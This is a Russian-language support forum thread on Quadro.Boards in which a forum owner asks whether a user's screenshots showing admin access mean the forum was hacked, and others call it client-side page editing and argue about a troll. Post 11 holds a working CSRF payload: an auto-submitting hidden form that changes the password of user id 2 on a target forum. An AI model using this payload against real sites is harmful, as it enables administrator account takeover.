Техническая поддержка сервиса Quadro.Boards

Объявление

Идет поиск Хранителя форума

Новости сервиса

О форуме

Quadro.Support – это форум технической поддержки различных проектов и сервисов Quadro.Systems LLC, на котором грамотные технические специалисты всегда смогут помочь вам в решении проблем, или же подсказать ответы на самые сложные вопросы. Так же на форуме собрана обширная база знаний по различным аспектам наших сервисов. Не забывайте пользоваться поиском ;)

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Техническая поддержка сервиса Quadro.Boards » Корзина » Дырка на форуме


Дырка на форуме

Сообщений 1 страница 12 из 12

1

Добрый день!
Вчера наш главный админ получила по почте вот такое сообщение от новичка

КАРАУЛ! Правда или нет? Пришло мне сегодня вот такое сообщение

http://s3.uploads.ru/t/Yx1jK.jpg
http://s3.uploads.ru/t/Tofi1.jpg


Ник нашего главного администратора Admin. А тут видно что пользователь Vitalik имеет возможность видеть меню Администрирования.

Как такое может быть и как от этого защититься?

0

2

Бармалей
Добрый день.

Посмотреть что видно из-под профиля Vitalik я смогу только вечером.

0

3

а ведь это не так сложно взломать форум.  просто прописать код  вот и тебе пожалуйста в админку путь открыт

0

4

dumuliy
Какой код?)

0

5

Вот мне тоже интересно :)

0

6

Duka написал(а):

Какой код?)

не хочу лишней головной боли

0

7

Это тот самый dumuliy, который у нас на форуме зарегистрировался в разное время под следующими никами:
vitalik, Vadim, dumuliy,  FEDYA, tester и т.п.
Прошу администрацию форума принять все меры к тому, чтобы этот троль был заблокирован не только на нашем форуме, но вообще не смог получить доступ к хостингу.
А чтобы неповадно было троллить, я тоже взломал его сайт таким же методом, какой он опубликовал здесь
http://s2.uploads.ru/t/OkYgc.png

Отредактировано Бармалей (08.02.2013 11:48:34)

0

8

Я гляжу у нас тут клуб юных хакеров образовался, и все прилежно освоили редактирование страницы через исходный код)
А можно нам поддержку взломать? И скриншот? Честное слово, тому кто взломает, ничего не будет)

+1

9

Lazary
Я это скриншот опубликовал не для того, чтобы популяризировать корректировки исходного кода страниц, а для того, чтобы показать этому лузеру, что женщин (а гл. админ нашего форума - женщина) такими вещами пугать не нужно.
Если для его блокировки нужно еще предъявить другие доказательства его "деятельности" могу отправить все материалы в личку Администрации техподдержки.

0

10

Бармалей

А давайте

0

11

<script lang=javascript>
  function hackedforum () {
document.hacked.submit();
  }
</script>
<body onload="hackedforum()">
<form method="post" name="hacked" action="http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&amp;id=2">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="req_new_password1" value="your_password">
<input type="hidden" name="req_new_password2" value="your_password">
</form>

0

12

Бармалей написал(а):

Это тот самый dumuliy, который у нас на форуме зарегистрировался в разное время под следующими никами:
vitalik, Vadim, dumuliy,  FEDYA, tester и т.п.
Прошу администрацию форума принять все меры к тому, чтобы этот троль был заблокирован не только на нашем форуме, но вообще не смог получить доступ к хостингу.
А чтобы неповадно было троллить, я тоже взломал его сайт таким же методом, какой он опубликовал здесь

Отредактировано Бармалей (Сегодня 11:48:34)

Тот сайт не управляется через админ панел. А через панел управления

0


Вы здесь » Техническая поддержка сервиса Quadro.Boards » Корзина » Дырка на форуме


Рейтинг форумов | Создать форум бесплатно © 2007–2016 «QuadroSystems» LLC